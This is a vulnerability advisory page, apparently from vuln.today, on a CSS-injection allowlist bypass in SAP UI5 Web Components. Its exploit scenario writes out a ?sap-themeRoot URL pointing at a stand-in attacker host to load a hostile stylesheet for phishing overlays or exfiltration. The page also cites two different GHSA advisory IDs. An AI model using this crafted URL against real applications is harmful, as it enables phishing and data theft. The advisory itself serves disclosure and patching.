Skip to main content

SAP UI5 Web Components CVE-2026-44767

| EUVDEUVD-2026-43597 MEDIUM
Missing Authentication for Critical Function (CWE-306)
2026-07-14 sap GHSA-5hp5-q35j-vjpg
6.1
CVSS 3.1 · Vendor: sap
Share

Severity by source

Vendor (sap) PRIMARY
6.1 MEDIUM
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
vuln.today AI
6.1 MEDIUM

URL parameter delivery requires no privileges; victim page load is mandatory (UI:R); CSS injection crosses into victim page scope (S:C); no availability impact applies.

3.1 AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (sap).

CVSS VectorVendor: sap

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Patch available
Jul 14, 2026 - 05:17 EUVD
Analysis Generated
Jul 14, 2026 - 01:23 vuln.today

DescriptionCVE.org

setThemeRoot() failed to enforce the sap-allowed-theme-origins allowlist. An attacker-controlled absolute cross-origin URL could be stored and used directly to construct a <link rel=stylesheet> element, even when no <meta name=sap-allowed-theme-origins> tag was present in the document. The same bypass was reachable via the ?sap-themeRoot URL parameter.Exploitation requires attacker-influenced input (e.g., a URL query parameter, tenant configuration, or user-supplied setting) to reach setThemeRoot(). A successful exploit allows an attacker to inject arbitrary CSS into the victim page, enabling:- UI redressing and clickjacking- Phishing overlays- Visual defacement- Limited data exfiltration via CSS attribute selectors targeting predictable DOM content

AnalysisAI

CSS stylesheet injection in SAP @ui5/webcomponents-base allows unauthenticated remote attackers to load arbitrary cross-origin stylesheets into victim pages by bypassing the sap-allowed-theme-origins allowlist enforcement inside setThemeRoot(). The ?sap-themeRoot URL query parameter is a direct delivery vector, making socially-engineered exploitation trivial - no authentication is required from the attacker (CVSS PR:N), only a victim page load (UI:R). …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Craft URL with ?sap-themeRoot pointing to attacker domain
Delivery
Deliver link via phishing to SAP application user
Exploit
Victim loads attacker-influenced URL in browser
Execution
setThemeRoot() skips cross-origin allowlist validation
Persist
Browser fetches malicious CSS via injected <link rel=stylesheet>
Impact
CSS redressing, phishing overlay, or attribute-selector exfiltration executes

Vulnerability AssessmentAI

Exploitation Exploitation requires attacker-influenced input to reach setThemeRoot() - the most accessible path is the ?sap-themeRoot URL query parameter, which requires only that a victim load an attacker-crafted URL (no server-side access or authentication by the attacker required; CVSS PR:N confirmed). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 score of 6.1 (Medium) is broadly appropriate: the scope-changed metric (S:C) reflects that injected CSS affects the entire victim page beyond the component itself, but the limited C:L/I:L impacts and mandatory user interaction (UI:R) keep severity below high. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker crafts a URL to a target SAP Fiori or UI5-based application, appending ?sap-themeRoot=https://attacker.example.com/evil/ where the attacker hosts a malicious CSS file, and delivers it to a victim via phishing email - a plausible vector since SAP application links are routinely shared in enterprise workflows. When the victim loads the URL, setThemeRoot() processes the parameter, bypasses the allowlist check, constructs a <link rel=stylesheet> pointing to the attacker's server, and the browser silently fetches the malicious stylesheet. …
Remediation The primary fix is to apply the patched release of @ui5/webcomponents-base referenced in GitHub Security Advisory GHSA-p8gx-753q-v89p (https://github.com/UI5/webcomponents/security/advisories/GHSA-p8gx-753q-v89p) and the SAP Security Patch Day advisory (https://url.sap/sapsecuritypatchday); upstream fix available (PR/commit), but the exact released patched version is not independently confirmed from available data - consult the advisories directly to identify the correct target version before updating. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-44767 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy